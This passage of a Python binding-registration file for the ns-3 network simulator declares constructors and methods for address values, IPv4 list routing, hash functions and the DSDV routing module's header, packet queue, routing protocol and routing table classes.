    for ctor_params in ([], [param('ns3::AddressChecker const &', 'arg0')]):
        cls.add_constructor(ctor_params)
    return
def register_Ns3AddressValue_methods(root_module, cls):
    """Register the Python bindings for ns3::AddressValue (address.h, module 'network')."""
    # Default, copy, and from-ns3::Address constructors.
    for ctor_params in (
            [],
            [param('ns3::AddressValue const &', 'arg0')],
            [param('ns3::Address const &', 'value')]):
        cls.add_constructor(ctor_params)
    checker_type = 'ns3::Ptr< ns3::AttributeChecker const >'
    # Standard ns3::AttributeValue interface plus the typed Get/Set pair.
    for name, retval, params, kwargs in (
            ('Copy', 'ns3::Ptr< ns3::AttributeValue >', [],
             {'is_const': True, 'is_virtual': True}),
            ('DeserializeFromString', 'bool',
             [param('std::string', 'value'), param(checker_type, 'checker')],
             {'is_virtual': True}),
            ('Get', 'ns3::Address', [], {'is_const': True}),
            ('SerializeToString', 'std::string', [param(checker_type, 'checker')],
             {'is_const': True, 'is_virtual': True}),
            ('Set', 'void', [param('ns3::Address const &', 'value')], {})):
        cls.add_method(name, retval, params, **kwargs)
    return
def register_Ns3Ipv4ListRouting_methods(root_module, cls):
    """Register the Python bindings for ns3::Ipv4ListRouting (ipv4-list-routing.h, module 'internet')."""
    # Copy constructor and default constructor.
    cls.add_constructor([param('ns3::Ipv4ListRouting const &', 'arg0')])
    cls.add_constructor([])
    # RouteInput callback type names, factored out for readability:
    # unicast (ucb), multicast (mcb), local-delivery (lcb), and error (ecb).
    ucb_type = 'ns3::Callback< void, ns3::Ptr< ns3::Ipv4Route >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >'
    mcb_type = 'ns3::Callback< void, ns3::Ptr< ns3::Ipv4MulticastRoute >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >'
    lcb_type = 'ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >'
    ecb_type = 'ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >'
    # (method name, return type, parameters, extra keyword arguments)
    methods = [
        ('AddRoutingProtocol', 'void',
         [param('ns3::Ptr< ns3::Ipv4RoutingProtocol >', 'routingProtocol'),
          param('int16_t', 'priority')],
         {'is_virtual': True}),
        ('GetNRoutingProtocols', 'uint32_t', [],
         {'is_const': True, 'is_virtual': True}),
        ('GetRoutingProtocol', 'ns3::Ptr< ns3::Ipv4RoutingProtocol >',
         [param('uint32_t', 'index'), param('int16_t &', 'priority', direction=2)],
         {'is_const': True, 'is_virtual': True}),
        ('GetTypeId', 'ns3::TypeId', [], {'is_static': True}),
        ('NotifyAddAddress', 'void',
         [param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')],
         {'is_virtual': True}),
        ('NotifyInterfaceDown', 'void', [param('uint32_t', 'interface')],
         {'is_virtual': True}),
        ('NotifyInterfaceUp', 'void', [param('uint32_t', 'interface')],
         {'is_virtual': True}),
        ('NotifyRemoveAddress', 'void',
         [param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')],
         {'is_virtual': True}),
        ('PrintRoutingTable', 'void',
         [param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')],
         {'is_const': True, 'is_virtual': True}),
        ('RouteInput', 'bool',
         [param('ns3::Ptr< ns3::Packet const >', 'p'),
          param('ns3::Ipv4Header const &', 'header'),
          param('ns3::Ptr< ns3::NetDevice const >', 'idev'),
          param(ucb_type, 'ucb'), param(mcb_type, 'mcb'),
          param(lcb_type, 'lcb'), param(ecb_type, 'ecb')],
         {'is_virtual': True}),
        ('RouteOutput', 'ns3::Ptr< ns3::Ipv4Route >',
         [param('ns3::Ptr< ns3::Packet >', 'p'),
          param('ns3::Ipv4Header const &', 'header'),
          param('ns3::Ptr< ns3::NetDevice >', 'oif'),
          param('ns3::Socket::SocketErrno &', 'sockerr')],
         {'is_virtual': True}),
        ('SetIpv4', 'void', [param('ns3::Ptr< ns3::Ipv4 >', 'ipv4')],
         {'is_virtual': True}),
        ('DoDispose', 'void', [], {'visibility': 'protected', 'is_virtual': True}),
        ('DoInitialize', 'void', [], {'visibility': 'protected', 'is_virtual': True}),
    ]
    for name, retval, params, kwargs in methods:
        cls.add_method(name, retval, params, **kwargs)
    return
def register_Ns3HashImplementation_methods(root_module, cls):
    """Register the Python bindings for ns3::Hash::Implementation (hash-function.h, module 'core')."""
    # Copy constructor and default constructor.
    cls.add_constructor([param('ns3::Hash::Implementation const &', 'arg0')])
    cls.add_constructor([])
    # GetHash32 and clear are pure virtual; GetHash64 is virtual only
    # (it has a default implementation upstream).
    cls.add_method('GetHash32', 'uint32_t',
                   [param('char const *', 'buffer'), param('size_t const', 'size')],
                   is_pure_virtual=True, is_virtual=True)
    cls.add_method('GetHash64', 'uint64_t',
                   [param('char const *', 'buffer'), param('size_t const', 'size')],
                   is_virtual=True)
    cls.add_method('clear', 'void', [], is_pure_virtual=True, is_virtual=True)
    return
def register_Ns3HashFunctionFnv1a_methods(root_module, cls):
    """Register bindings for ns3::Hash::Function::Fnv1a (hash-fnv.h, module 'core')."""
    # Copy constructor and default constructor.
    cls.add_constructor([param('ns3::Hash::Function::Fnv1a const &', 'arg0')])
    cls.add_constructor([])
    # Virtual 32/64-bit hash entry points over (buffer, size).
    for method_name, return_type in (('GetHash32', 'uint32_t'),
                                     ('GetHash64', 'uint64_t')):
        cls.add_method(method_name, return_type,
                       [param('char const *', 'buffer'), param('size_t const', 'size')],
                       is_virtual=True)
    # void clear() -- virtual.
    cls.add_method('clear', 'void', [], is_virtual=True)
    return
def register_Ns3HashFunctionHash32_methods(root_module, cls):
    """Register bindings for ns3::Hash::Function::Hash32 (hash-function.h, module 'core')."""
    # Copy constructor, then the constructor taking a Hash32Function_ptr.
    cls.add_constructor([param('ns3::Hash::Function::Hash32 const &', 'arg0')])
    cls.add_constructor([param('ns3::Hash::Hash32Function_ptr', 'hp')])
    # uint32_t GetHash32(char const * buffer, size_t const size) -- virtual.
    # (This adapter exposes only the 32-bit entry point.)
    cls.add_method('GetHash32', 'uint32_t',
                   [param('char const *', 'buffer'), param('size_t const', 'size')],
                   is_virtual=True)
    # void clear() -- virtual.
    cls.add_method('clear', 'void', [], is_virtual=True)
    return
def register_Ns3HashFunctionHash64_methods(root_module, cls):
    """Register bindings for ns3::Hash::Function::Hash64 (hash-function.h, module 'core')."""
    # Copy constructor, then the constructor taking a Hash64Function_ptr.
    cls.add_constructor([param('ns3::Hash::Function::Hash64 const &', 'arg0')])
    cls.add_constructor([param('ns3::Hash::Hash64Function_ptr', 'hp')])
    # Virtual 32/64-bit hash entry points over (buffer, size).
    for method_name, return_type in (('GetHash32', 'uint32_t'),
                                     ('GetHash64', 'uint64_t')):
        cls.add_method(method_name, return_type,
                       [param('char const *', 'buffer'), param('size_t const', 'size')],
                       is_virtual=True)
    # void clear() -- virtual.
    cls.add_method('clear', 'void', [], is_virtual=True)
    return
def register_Ns3HashFunctionMurmur3_methods(root_module, cls):
    """Register bindings for ns3::Hash::Function::Murmur3 (hash-murmur3.h, module 'core')."""
    # Copy constructor and default constructor.
    cls.add_constructor([param('ns3::Hash::Function::Murmur3 const &', 'arg0')])
    cls.add_constructor([])
    # Virtual 32/64-bit hash entry points over (buffer, size).
    for method_name, return_type in (('GetHash32', 'uint32_t'),
                                     ('GetHash64', 'uint64_t')):
        cls.add_method(method_name, return_type,
                       [param('char const *', 'buffer'), param('size_t const', 'size')],
                       is_virtual=True)
    # void clear() -- virtual.
    cls.add_method('clear', 'void', [], is_virtual=True)
    return
def register_Ns3DsdvDsdvHeader_methods(root_module, cls):
    """Register bindings for ns3::dsdv::DsdvHeader (dsdv-packet.h, module 'dsdv')."""
    # operator<< support for printing the header.
    cls.add_output_stream_operator()
    # Copy constructor, then the full constructor with C++ default arguments.
    cls.add_constructor([param('ns3::dsdv::DsdvHeader const &', 'arg0')])
    cls.add_constructor([param('ns3::Ipv4Address', 'dst', default_value='ns3::Ipv4Address()'),
                         param('uint32_t', 'hopcount', default_value='0'),
                         param('uint32_t', 'dstSeqNo', default_value='0')])
    # uint32_t Deserialize(Buffer::Iterator start) -- virtual.
    cls.add_method('Deserialize', 'uint32_t',
                   [param('ns3::Buffer::Iterator', 'start')],
                   is_virtual=True)
    # Plain const accessors for the header fields.
    for accessor, return_type in (('GetDst', 'ns3::Ipv4Address'),
                                  ('GetDstSeqno', 'uint32_t'),
                                  ('GetHopCount', 'uint32_t')):
        cls.add_method(accessor, return_type, [], is_const=True)
    # Const virtual overrides from the ns3::Header interface.
    cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [],
                   is_const=True, is_virtual=True)
    cls.add_method('GetSerializedSize', 'uint32_t', [],
                   is_const=True, is_virtual=True)
    # static TypeId GetTypeId()
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    # void Print(std::ostream & os) const -- virtual.
    cls.add_method('Print', 'void',
                   [param('std::ostream &', 'os')],
                   is_const=True, is_virtual=True)
    # void Serialize(Buffer::Iterator start) const -- virtual.
    cls.add_method('Serialize', 'void',
                   [param('ns3::Buffer::Iterator', 'start')],
                   is_const=True, is_virtual=True)
    # One-argument mutators for the header fields.
    cls.add_method('SetDst', 'void', [param('ns3::Ipv4Address', 'destination')])
    cls.add_method('SetDstSeqno', 'void', [param('uint32_t', 'sequenceNumber')])
    cls.add_method('SetHopCount', 'void', [param('uint32_t', 'hopCount')])
    return
def register_Ns3DsdvPacketQueue_methods(root_module, cls):
    """Register bindings for ns3::dsdv::PacketQueue (dsdv-packet-queue.h, module 'dsdv')."""
    # Copy constructor and default constructor.
    cls.add_constructor([param('ns3::dsdv::PacketQueue const &', 'arg0')])
    cls.add_constructor([])
    # bool Dequeue(Ipv4Address dst, QueueEntry & entry)
    cls.add_method('Dequeue', 'bool',
                   [param('ns3::Ipv4Address', 'dst'),
                    param('ns3::dsdv::QueueEntry &', 'entry')])
    # void DropPacketWithDst(Ipv4Address dst)
    cls.add_method('DropPacketWithDst', 'void', [param('ns3::Ipv4Address', 'dst')])
    # bool Enqueue(QueueEntry & entry)
    cls.add_method('Enqueue', 'bool', [param('ns3::dsdv::QueueEntry &', 'entry')])
    # bool Find(Ipv4Address dst)
    cls.add_method('Find', 'bool', [param('ns3::Ipv4Address', 'dst')])
    # uint32_t GetCountForPacketsWithDst(Ipv4Address dst)
    cls.add_method('GetCountForPacketsWithDst', 'uint32_t',
                   [param('ns3::Ipv4Address', 'dst')])
    # Const accessors for the queue limits and timeout.
    for accessor, return_type in (('GetMaxPacketsPerDst', 'uint32_t'),
                                  ('GetMaxQueueLen', 'uint32_t'),
                                  ('GetQueueTimeout', 'ns3::Time')):
        cls.add_method(accessor, return_type, [], is_const=True)
    # uint32_t GetSize() -- non-const in the C++ API, so no is_const here.
    cls.add_method('GetSize', 'uint32_t', [])
    # One-argument mutators for the queue limits and timeout.
    cls.add_method('SetMaxPacketsPerDst', 'void', [param('uint32_t', 'len')])
    cls.add_method('SetMaxQueueLen', 'void', [param('uint32_t', 'len')])
    cls.add_method('SetQueueTimeout', 'void', [param('ns3::Time', 't')])
    return
def register_Ns3DsdvQueueEntry_methods(root_module, cls):
    """Register bindings for ns3::dsdv::QueueEntry (dsdv-packet-queue.h, module 'dsdv').

    The registered accessors show a QueueEntry holding a buffered packet, its
    IPv4 header, an expiry time, and the unicast-forward / error callbacks.
    The long Callback<...> type strings below must match the C++ template
    instantiations exactly; do not reformat them.
    """
    cls.add_binary_comparison_operator('==')
    ## dsdv-packet-queue.h (module 'dsdv'): ns3::dsdv::QueueEntry::QueueEntry(ns3::dsdv::QueueEntry const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::dsdv::QueueEntry const &', 'arg0')])
    ## dsdv-packet-queue.h (module 'dsdv'): ns3::dsdv::QueueEntry::QueueEntry(ns3::Ptr<ns3::Packet const> pa=0, ns3::Ipv4Header const & h=ns3::Ipv4Header(), ns3::Callback<void, ns3::Ptr<ns3::Ipv4Route>, ns3::Ptr<ns3::Packet const>, ns3::Ipv4Header const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> ucb=ns3::Callback<void, ns3::Ptr<ns3::Ipv4Route>, ns3::Ptr<const ns3::Packet>, const ns3::Ipv4Header&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty>(), ns3::Callback<void, ns3::Ptr<ns3::Packet const>, ns3::Ipv4Header const&, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> ecb=ns3::Callback<void, ns3::Ptr<const ns3::Packet>, const ns3::Ipv4Header&, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty>()) [constructor]
    cls.add_constructor([param('ns3::Ptr< ns3::Packet const >', 'pa', default_value='0'), param('ns3::Ipv4Header const &', 'h', default_value='ns3::Ipv4Header()'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4Route >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ucb', default_value='ns3::Callback<void, ns3::Ptr<ns3::Ipv4Route>, ns3::Ptr<const ns3::Packet>, const ns3::Ipv4Header&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty>()'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ecb', default_value='ns3::Callback<void, ns3::Ptr<const ns3::Packet>, const ns3::Ipv4Header&, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty>()')])
    ## dsdv-packet-queue.h (module 'dsdv'): ns3::Callback<void, ns3::Ptr<ns3::Packet const>, ns3::Ipv4Header const&, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> ns3::dsdv::QueueEntry::GetErrorCallback() const [member function]
    cls.add_method('GetErrorCallback',
                   'ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >',
                   [],
                   is_const=True)
    ## dsdv-packet-queue.h (module 'dsdv'): ns3::Time ns3::dsdv::QueueEntry::GetExpireTime() const [member function]
    cls.add_method('GetExpireTime',
                   'ns3::Time',
                   [],
                   is_const=True)
    ## dsdv-packet-queue.h (module 'dsdv'): ns3::Ipv4Header ns3::dsdv::QueueEntry::GetIpv4Header() const [member function]
    cls.add_method('GetIpv4Header',
                   'ns3::Ipv4Header',
                   [],
                   is_const=True)
    ## dsdv-packet-queue.h (module 'dsdv'): ns3::Ptr<ns3::Packet const> ns3::dsdv::QueueEntry::GetPacket() const [member function]
    cls.add_method('GetPacket',
                   'ns3::Ptr< ns3::Packet const >',
                   [],
                   is_const=True)
    ## dsdv-packet-queue.h (module 'dsdv'): ns3::Callback<void, ns3::Ptr<ns3::Ipv4Route>, ns3::Ptr<ns3::Packet const>, ns3::Ipv4Header const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> ns3::dsdv::QueueEntry::GetUnicastForwardCallback() const [member function]
    cls.add_method('GetUnicastForwardCallback',
                   'ns3::Callback< void, ns3::Ptr< ns3::Ipv4Route >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >',
                   [],
                   is_const=True)
    ## dsdv-packet-queue.h (module 'dsdv'): void ns3::dsdv::QueueEntry::SetErrorCallback(ns3::Callback<void, ns3::Ptr<ns3::Packet const>, ns3::Ipv4Header const&, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> ecb) [member function]
    cls.add_method('SetErrorCallback',
                   'void',
                   [param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ecb')])
    ## dsdv-packet-queue.h (module 'dsdv'): void ns3::dsdv::QueueEntry::SetExpireTime(ns3::Time exp) [member function]
    cls.add_method('SetExpireTime',
                   'void',
                   [param('ns3::Time', 'exp')])
    ## dsdv-packet-queue.h (module 'dsdv'): void ns3::dsdv::QueueEntry::SetIpv4Header(ns3::Ipv4Header h) [member function]
    cls.add_method('SetIpv4Header',
                   'void',
                   [param('ns3::Ipv4Header', 'h')])
    ## dsdv-packet-queue.h (module 'dsdv'): void ns3::dsdv::QueueEntry::SetPacket(ns3::Ptr<ns3::Packet const> p) [member function]
    cls.add_method('SetPacket',
                   'void',
                   [param('ns3::Ptr< ns3::Packet const >', 'p')])
    ## dsdv-packet-queue.h (module 'dsdv'): void ns3::dsdv::QueueEntry::SetUnicastForwardCallback(ns3::Callback<void, ns3::Ptr<ns3::Ipv4Route>, ns3::Ptr<ns3::Packet const>, ns3::Ipv4Header const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> ucb) [member function]
    cls.add_method('SetUnicastForwardCallback',
                   'void',
                   [param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4Route >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ucb')])
    return
def register_Ns3DsdvRoutingProtocol_methods(root_module, cls):
    """Register bindings for ns3::dsdv::RoutingProtocol (dsdv-routing-protocol.h, module 'dsdv').

    Covers the Ipv4RoutingProtocol virtual interface (RouteInput/RouteOutput,
    interface/address notifications, PrintRoutingTable, SetIpv4), the
    DSDV-specific flag accessors/mutators, AssignStreams, and the static
    DSDV_PORT attribute.  The Callback<...> strings in RouteInput must match
    the C++ template instantiations exactly; do not reformat them.
    """
    ## dsdv-routing-protocol.h (module 'dsdv'): ns3::dsdv::RoutingProtocol::RoutingProtocol(ns3::dsdv::RoutingProtocol const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::dsdv::RoutingProtocol const &', 'arg0')])
    ## dsdv-routing-protocol.h (module 'dsdv'): ns3::dsdv::RoutingProtocol::RoutingProtocol() [constructor]
    cls.add_constructor([])
    ## dsdv-routing-protocol.h (module 'dsdv'): int64_t ns3::dsdv::RoutingProtocol::AssignStreams(int64_t stream) [member function]
    cls.add_method('AssignStreams',
                   'int64_t',
                   [param('int64_t', 'stream')])
    ## dsdv-routing-protocol.h (module 'dsdv'): void ns3::dsdv::RoutingProtocol::DoDispose() [member function]
    cls.add_method('DoDispose',
                   'void',
                   [],
                   is_virtual=True)
    ## dsdv-routing-protocol.h (module 'dsdv'): bool ns3::dsdv::RoutingProtocol::GetEnableBufferFlag() const [member function]
    cls.add_method('GetEnableBufferFlag',
                   'bool',
                   [],
                   is_const=True)
    ## dsdv-routing-protocol.h (module 'dsdv'): bool ns3::dsdv::RoutingProtocol::GetEnableRAFlag() const [member function]
    cls.add_method('GetEnableRAFlag',
                   'bool',
                   [],
                   is_const=True)
    ## dsdv-routing-protocol.h (module 'dsdv'): static ns3::TypeId ns3::dsdv::RoutingProtocol::GetTypeId() [member function]
    cls.add_method('GetTypeId',
                   'ns3::TypeId',
                   [],
                   is_static=True)
    ## dsdv-routing-protocol.h (module 'dsdv'): bool ns3::dsdv::RoutingProtocol::GetWSTFlag() const [member function]
    cls.add_method('GetWSTFlag',
                   'bool',
                   [],
                   is_const=True)
    ## dsdv-routing-protocol.h (module 'dsdv'): void ns3::dsdv::RoutingProtocol::NotifyAddAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function]
    cls.add_method('NotifyAddAddress',
                   'void',
                   [param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')],
                   is_virtual=True)
    ## dsdv-routing-protocol.h (module 'dsdv'): void ns3::dsdv::RoutingProtocol::NotifyInterfaceDown(uint32_t interface) [member function]
    cls.add_method('NotifyInterfaceDown',
                   'void',
                   [param('uint32_t', 'interface')],
                   is_virtual=True)
    ## dsdv-routing-protocol.h (module 'dsdv'): void ns3::dsdv::RoutingProtocol::NotifyInterfaceUp(uint32_t interface) [member function]
    cls.add_method('NotifyInterfaceUp',
                   'void',
                   [param('uint32_t', 'interface')],
                   is_virtual=True)
    ## dsdv-routing-protocol.h (module 'dsdv'): void ns3::dsdv::RoutingProtocol::NotifyRemoveAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function]
    cls.add_method('NotifyRemoveAddress',
                   'void',
                   [param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')],
                   is_virtual=True)
    ## dsdv-routing-protocol.h (module 'dsdv'): void ns3::dsdv::RoutingProtocol::PrintRoutingTable(ns3::Ptr<ns3::OutputStreamWrapper> stream) const [member function]
    cls.add_method('PrintRoutingTable',
                   'void',
                   [param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')],
                   is_const=True, is_virtual=True)
    ## dsdv-routing-protocol.h (module 'dsdv'): bool ns3::dsdv::RoutingProtocol::RouteInput(ns3::Ptr<ns3::Packet const> p, ns3::Ipv4Header const & header, ns3::Ptr<const ns3::NetDevice> idev, ns3::Callback<void, ns3::Ptr<ns3::Ipv4Route>, ns3::Ptr<ns3::Packet const>, ns3::Ipv4Header const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> ucb, ns3::Callback<void,ns3::Ptr<ns3::Ipv4MulticastRoute>,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> mcb, ns3::Callback<void,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,unsigned int,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> lcb, ns3::Callback<void, ns3::Ptr<ns3::Packet const>, ns3::Ipv4Header const&, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> ecb) [member function]
    cls.add_method('RouteInput',
                   'bool',
                   [param('ns3::Ptr< ns3::Packet const >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::NetDevice const >', 'idev'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4Route >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ucb'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4MulticastRoute >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'mcb'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'lcb'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ecb')],
                   is_virtual=True)
    ## dsdv-routing-protocol.h (module 'dsdv'): ns3::Ptr<ns3::Ipv4Route> ns3::dsdv::RoutingProtocol::RouteOutput(ns3::Ptr<ns3::Packet> p, ns3::Ipv4Header const & header, ns3::Ptr<ns3::NetDevice> oif, ns3::Socket::SocketErrno & sockerr) [member function]
    cls.add_method('RouteOutput',
                   'ns3::Ptr< ns3::Ipv4Route >',
                   [param('ns3::Ptr< ns3::Packet >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::NetDevice >', 'oif'), param('ns3::Socket::SocketErrno &', 'sockerr')],
                   is_virtual=True)
    ## dsdv-routing-protocol.h (module 'dsdv'): void ns3::dsdv::RoutingProtocol::SetEnableBufferFlag(bool f) [member function]
    cls.add_method('SetEnableBufferFlag',
                   'void',
                   [param('bool', 'f')])
    ## dsdv-routing-protocol.h (module 'dsdv'): void ns3::dsdv::RoutingProtocol::SetEnableRAFlag(bool f) [member function]
    cls.add_method('SetEnableRAFlag',
                   'void',
                   [param('bool', 'f')])
    ## dsdv-routing-protocol.h (module 'dsdv'): void ns3::dsdv::RoutingProtocol::SetIpv4(ns3::Ptr<ns3::Ipv4> ipv4) [member function]
    cls.add_method('SetIpv4',
                   'void',
                   [param('ns3::Ptr< ns3::Ipv4 >', 'ipv4')],
                   is_virtual=True)
    ## dsdv-routing-protocol.h (module 'dsdv'): void ns3::dsdv::RoutingProtocol::SetWSTFlag(bool f) [member function]
    cls.add_method('SetWSTFlag',
                   'void',
                   [param('bool', 'f')])
    ## dsdv-routing-protocol.h (module 'dsdv'): ns3::dsdv::RoutingProtocol::DSDV_PORT [variable]
    cls.add_static_attribute('DSDV_PORT', 'uint32_t const', is_const=True)
    return
def register_Ns3DsdvRoutingTable_methods(root_module, cls):
    """Register bindings for ns3::dsdv::RoutingTable (dsdv-rtable.h, module 'dsdv')."""
    # Reference type of the address -> RoutingTableEntry map used by several methods.
    route_map_ref = 'std::map< ns3::Ipv4Address, ns3::dsdv::RoutingTableEntry > &'
    # Copy constructor and default constructor.
    cls.add_constructor([param('ns3::dsdv::RoutingTable const &', 'arg0')])
    cls.add_constructor([])
    # bool AddIpv4Event(Ipv4Address address, EventId id)
    cls.add_method('AddIpv4Event', 'bool',
                   [param('ns3::Ipv4Address', 'address'), param('ns3::EventId', 'id')])
    # bool AddRoute(RoutingTableEntry & r)
    cls.add_method('AddRoute', 'bool', [param('ns3::dsdv::RoutingTableEntry &', 'r')])
    # bool AnyRunningEvent(Ipv4Address address)
    cls.add_method('AnyRunningEvent', 'bool', [param('ns3::Ipv4Address', 'address')])
    # void Clear()
    cls.add_method('Clear', 'void', [])
    # void DeleteAllRoutesFromInterface(Ipv4InterfaceAddress iface)
    cls.add_method('DeleteAllRoutesFromInterface', 'void',
                   [param('ns3::Ipv4InterfaceAddress', 'iface')])
    # bool DeleteIpv4Event(Ipv4Address address)
    cls.add_method('DeleteIpv4Event', 'bool', [param('ns3::Ipv4Address', 'address')])
    # bool DeleteRoute(Ipv4Address dst)
    cls.add_method('DeleteRoute', 'bool', [param('ns3::Ipv4Address', 'dst')])
    # bool ForceDeleteIpv4Event(Ipv4Address address)
    cls.add_method('ForceDeleteIpv4Event', 'bool', [param('ns3::Ipv4Address', 'address')])
    # EventId GetEventId(Ipv4Address address)
    cls.add_method('GetEventId', 'ns3::EventId', [param('ns3::Ipv4Address', 'address')])
    # void GetListOfAllRoutes(route map & allRoutes)
    cls.add_method('GetListOfAllRoutes', 'void', [param(route_map_ref, 'allRoutes')])
    # void GetListOfDestinationWithNextHop(Ipv4Address nxtHp, route map & dstList)
    cls.add_method('GetListOfDestinationWithNextHop', 'void',
                   [param('ns3::Ipv4Address', 'nxtHp'), param(route_map_ref, 'dstList')])
    # Time Getholddowntime() const
    cls.add_method('Getholddowntime', 'ns3::Time', [], is_const=True)
    # Two LookupRoute overloads: the plain lookup and the forRouteInput variant.
    cls.add_method('LookupRoute', 'bool',
                   [param('ns3::Ipv4Address', 'dst'),
                    param('ns3::dsdv::RoutingTableEntry &', 'rt')])
    cls.add_method('LookupRoute', 'bool',
                   [param('ns3::Ipv4Address', 'id'),
                    param('ns3::dsdv::RoutingTableEntry &', 'rt'),
                    param('bool', 'forRouteInput')])
    # void Print(Ptr<OutputStreamWrapper> stream) const
    cls.add_method('Print', 'void',
                   [param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')],
                   is_const=True)
    # void Purge(route map & removedAddresses)
    cls.add_method('Purge', 'void', [param(route_map_ref, 'removedAddresses')])
    # uint32_t RoutingTableSize()
    cls.add_method('RoutingTableSize', 'uint32_t', [])
    # void Setholddowntime(Time t)
    cls.add_method('Setholddowntime', 'void', [param('ns3::Time', 't')])
    # bool Update(RoutingTableEntry & rt)
    cls.add_method('Update', 'bool', [param('ns3::dsdv::RoutingTableEntry &', 'rt')])
    return
def register_Ns3DsdvRoutingTableEntry_methods(root_module, cls):
    """Register bindings for ns3::dsdv::RoutingTableEntry (dsdv-rtable.h, module 'dsdv')."""
    # Copy constructor.
    cls.add_constructor([param('ns3::dsdv::RoutingTableEntry const &', 'arg0')])
    # Full constructor; every argument carries its C++ default value string.
    cls.add_constructor([param('ns3::Ptr< ns3::NetDevice >', 'dev', default_value='0'), param('ns3::Ipv4Address', 'dst', default_value='ns3::Ipv4Address()'), param('uint32_t', 'm_seqNo', default_value='0'), param('ns3::Ipv4InterfaceAddress', 'iface', default_value='ns3::Ipv4InterfaceAddress()'), param('uint32_t', 'hops', default_value='0'), param('ns3::Ipv4Address', 'nextHop', default_value='ns3::Ipv4Address()'), param('ns3::Time', 'lifetime', default_value='ns3::Simulator::Now( )'), param('ns3::Time', 'SettlingTime', default_value='ns3::Simulator::Now( )'), param('bool', 'changedEntries', default_value='false')])
    # Const, zero-argument accessors, registered in the original declaration order.
    for accessor, return_type in (
            ('GetDestination', 'ns3::Ipv4Address'),
            ('GetEntriesChanged', 'bool'),
            ('GetFlag', 'ns3::dsdv::RouteFlags'),
